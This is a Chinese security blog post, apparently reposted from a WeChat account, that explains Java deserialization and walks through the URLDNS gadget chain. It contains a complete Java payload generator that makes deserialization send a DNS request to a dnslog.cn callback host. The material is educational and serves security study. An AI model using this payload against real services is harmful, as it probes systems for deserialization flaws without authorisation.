Java安全之URLDNS链分析
前言
Java反序列化
package com.garck3h.Javasecure;
/**
* Created by IntelliJ IDEA.
*
* @Author Garck3h
* @Date 2023/7/17 11:17 上午
* Life is endless, and there is no end to it.
**/
import java.io.*;
public class SerializeDemo {
public static void main(String[] args) {
// 创建一个待序列化的对象
Person person = new Person("Alice", 25);
// 序列化person对象到.ser文件
serialize(person, "person.bin");
// 从.ser文件反序列化对象
Person deserializedPerson = deserialize("person.bin");
// 打印反序列化后的对象信息
System.out.println("Name: " + deserializedPerson.getName());
System.out.println("Age: " + deserializedPerson.getAge());
}
// 序列化对象到person.bin文件
private static void serialize(Object object, String fileName) {
try (FileOutputStream fos = new FileOutputStream(fileName);
ObjectOutputStream oos = new ObjectOutputStream(fos)) {
oos.writeObject(object);
System.out.println("Object serialized to " + fileName);
} catch (IOException e) {
e.printStackTrace();
}
}
// 从person.bin文件反序列化对象
private static Person deserialize(String fileName) {
try (FileInputStream fis = new FileInputStream(fileName);
ObjectInputStream ois = new ObjectInputStream(fis)) {
return (Person) ois.readObject();
} catch (IOException | ClassNotFoundException e) {
e.printStackTrace();
}
return null;
}
// 定义可序列化的Person类,包含了两个属性,分别是name和age
private static class Person implements Serializable {
private String name;
private int age;
public Person(String name, int age) {
this.name = name;
this.age = age;
}
public String getName() {
return name;
}
public int getAge() {
return age;
}
}
}
URLDNS
利用链:
HashMap.readObject(ObjectInputStream in)
HashMap.putVal()
HashMap -> hash()
URL -> hashCode()
URLStreamHandler -> hashCode()
URLStreamHandler -> getHostAddress()
URL -> getHostAddress()
InetAddress -> getByName()
package com.garck3h.Javasecure;
/**
* Created by IntelliJ IDEA.
*
* @Author Garck3h
* @Date 2023/7/17 11:12 上午
* Life is endless, and there is no end to it.
**/
import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class demo {
public static void main(String[] args) throws Exception {
//实力化一个hashMap对象和一个URL对象
HashMap hashMap = new HashMap();
URL url = new URL("http://cm1b9l.dnslog.cn");
//这段代码通过反射获取了 url 对象的 hashCode 字段,并将其设置为可访问。
Field hashCodeField = url.getClass().getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
// 避免创建payload时触发请求
hashCodeField.set(url, 0);
hashMap.put(url, null);
// 使利用链执行时能够触发请求
hashCodeField.set(url,-1);
//进行反序列化操作,输出为ser.bin文件
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(new File("ser.bin")));
oos.writeObject(hashMap);
oos.close();
System.out.println("序列化成功");
//进行反序列化,以触发DNS解析
ObjectInputStream oosin = new ObjectInputStream(new FileInputStream("ser.bin"));
oosin.readObject();
oosin.close();
System.out.println("反序列化成功");
}
}
Ysoserial.URLDNS
参考
原文始发于微信公众号(pentest):Java安全之URLDNS链分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论